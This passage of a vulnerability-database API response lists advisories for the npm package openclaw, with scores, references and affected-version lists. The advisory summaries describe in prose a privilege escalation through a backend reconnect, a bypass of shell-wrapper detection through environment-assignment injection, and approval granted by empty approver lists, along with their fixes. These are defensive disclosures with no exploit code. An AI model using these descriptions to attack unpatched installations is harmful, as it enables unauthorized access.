                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w2yd-uw91-9yck"
                        },
                        {
                            "vulnerability": "VCID-wyat-1259-2kg9"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8"
                }
            ],
            "aliases": [
                "CVE-2026-41915",
                "GHSA-cm8v-2vh9-cxf3"
            ],
            "risk_score": 2.6,
            "exploitability": "0.5",
            "weighted_severity": "5.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-2h6a-becf-x7ej"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91183?format=api",
            "vulnerability_id": "VCID-2hca-3v8f-f3e8",
            "summary": "OpenClaw: Gateway Backend Reconnect lets Non-Admin Operator Scopes Self-Claim operator.admin\n## Summary\n\nGateway Backend Reconnect lets Non-Admin Operator Scopes Self-Claim operator.admin\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Affected versions: `<= 2026.3.24`\n- First patched version: `2026.3.25`\n- Latest published npm version at verification time: `2026.3.24`\n\n## Details\n\nBackend-labeled reconnects could previously self-request broader scopes and bypass pairing, allowing non-admin operators to reconnect as `operator.admin`. Commit `d3d8e316bd819d3c7e34253aeb7eccb2510f5f48` removes the backend self-pairing skip and requires pairing when requested scopes exceed the approved baseline.\n\nVerified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `d3d8e316bd819d3c7e34253aeb7eccb2510f5f48`.\n\n## Fix Commit(s)\n\n- `d3d8e316bd819d3c7e34253aeb7eccb2510f5f48`",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35663",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.0005",
                            "scoring_system": "epss",
                            "scoring_elements": "0.15986",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.0005",
                            "scoring_system": "epss",
                            "scoring_elements": "0.1603",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.0005",
                            "scoring_system": "epss",
                            "scoring_elements": "0.1604",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35663"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/d3d8e316bd819d3c7e34253aeb7eccb2510f5f48",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "9.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-14T14:27:55Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/d3d8e316bd819d3c7e34253aeb7eccb2510f5f48"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-9hjh-fr4f-gxc4",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "9.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-14T14:27:55Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-9hjh-fr4f-gxc4"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35663",
                    "reference_id": "CVE-2026-35663",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35663"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-9hjh-fr4f-gxc4",
                    "reference_id": "GHSA-9hjh-fr4f-gxc4",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "CRITICAL",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-9hjh-fr4f-gxc4"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-backend-reconnect-scope-self-claim",
                    "reference_id": "openclaw-privilege-escalation-via-backend-reconnect-scope-self-claim",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-14T14:27:55Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-backend-reconnect-scope-self-claim"
                }
            ],
            "fixed_packages": [],
            "aliases": [
                "CVE-2026-35663",
                "GHSA-9hjh-fr4f-gxc4"
            ],
            "risk_score": 4.5,
            "exploitability": "0.5",
            "weighted_severity": "9.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-2hca-3v8f-f3e8"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89219?format=api",
            "vulnerability_id": "VCID-2khh-wv8p-97ff",
            "summary": "OpenClaw: Shell-wrapper detection missed env-argv assignment injection forms\n## Summary\n\nShell-wrapper detection missed env-argv assignment injection forms.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `>= 2026.2.22 < 2026.4.12`\n- Patched versions: `>= 2026.4.12`\n\n## Impact\n\nExec preflight handling missed shell-wrapper and argv-level environment assignment forms that could affect execution semantics, including high-risk shell environment controls.\n\n## Technical Details\n\nThe fix broadens shell-wrapper detection and blocks environment assignments in argv forms. High-risk shell variables such as `SHELLOPTS` and `PS4` are covered by the host environment security policy.\n\n## Fix\n\nThe issue was fixed in #65717. The first stable tag containing the fix is `v2026.4.12`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `8f8492d172f4c5b4fd7dd9a47855ed620c8770ab`\n- PR: #65717\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.12 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @decsecre583 for reporting this issue.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42435",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00108",
                            "scoring_system": "epss",
                            "scoring_elements": "0.28675",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00124",
                            "scoring_system": "epss",
                            "scoring_elements": "0.31153",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00124",
                            "scoring_system": "epss",
                            "scoring_elements": "0.31188",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42435"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/8f8492d172f4c5b4fd7dd9a47855ed620c8770ab",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-06T12:30:14Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/8f8492d172f4c5b4fd7dd9a47855ed620c8770ab"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/pull/65717",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/pull/65717"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-j6c7-3h5x-99g9",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-06T12:30:14Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-j6c7-3h5x-99g9"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42435",
                    "reference_id": "CVE-2026-42435",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42435"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-j6c7-3h5x-99g9",
                    "reference_id": "GHSA-j6c7-3h5x-99g9",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-j6c7-3h5x-99g9"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-shell-wrapper-detection-bypass-via-environment-variable-assignment-injection",
                    "reference_id": "openclaw-shell-wrapper-detection-bypass-via-environment-variable-assignment-injection",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-06T12:30:14Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-shell-wrapper-detection-bypass-via-environment-variable-assignment-injection"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/110264?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.12",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-6cfj-zugb-7uhq"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-h9a4-1twb-d7d1"
                        },
                        {
                            "vulnerability": "VCID-hphn-8fnj-qkh2"
                        },
                        {
                            "vulnerability": "VCID-hy24-6xpe-pkb7"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2yd-uw91-9yck"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.12"
                }
            ],
            "aliases": [
                "CVE-2026-42435",
                "GHSA-j6c7-3h5x-99g9"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "7.9",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-2khh-wv8p-97ff"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89236?format=api",
            "vulnerability_id": "VCID-2mxq-krq5-bycx",
            "summary": "OpenClaw: Empty approver lists could grant explicit approval authorization\n## Summary\n\nEmpty approver lists could grant explicit approval authorization.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.12`\n- Patched versions: `>= 2026.4.12`\n\n## Impact\n\nFor helper-backed channels, an empty resolved approver list could be interpreted as explicit approval authorization, allowing a sender outside the normal channel authorization gate to resolve pending approvals if they knew an approval id.\n\n## Technical Details\n\nThe fix prevents empty approver lists from granting explicit approval authorization and adds regression coverage for unauthorized senders.\n\n## Fix\n\nThe issue was fixed in #65714. The first stable tag containing the fix is `v2026.4.12`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `0a105c0900de701d2ee9f1abc96b017afbd0afdd`\n- PR: #65714\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.12 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @anshumanbh for reporting this issue.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-43574",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00032",
                            "scoring_system": "epss",
                            "scoring_elements": "0.09702",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00037",
                            "scoring_system": "epss",
                            "scoring_elements": "0.11327",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00037",
                            "scoring_system": "epss",
                            "scoring_elements": "0.11359",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-43574"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
                        },
                        {
                            "value": "6.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/0a105c0900de701d2ee9f1abc96b017afbd0afdd",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
                        },
                        {
                            "value": "6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "6.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T12:19:51Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/0a105c0900de701d2ee9f1abc96b017afbd0afdd"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/pull/65714",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
                        },
                        {
                            "value": "6.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/pull/65714"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-49cg-279w-m73x",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "6.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T12:19:51Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-49cg-279w-m73x"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43574",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
                        },
                        {
                            "value": "6.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43574"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-improper-authorization-via-empty-approver-lists",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
                        },
                        {
                            "value": "6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "6.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T12:19:51Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-improper-authorization-via-empty-approver-lists"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-49cg-279w-m73x",
                    "reference_id": "GHSA-49cg-279w-m73x",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-49cg-279w-m73x"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/110264?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.12",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-6cfj-zugb-7uhq"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-h9a4-1twb-d7d1"
                        },
                        {
                            "vulnerability": "VCID-hphn-8fnj-qkh2"
                        },
                        {
                            "vulnerability": "VCID-hy24-6xpe-pkb7"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
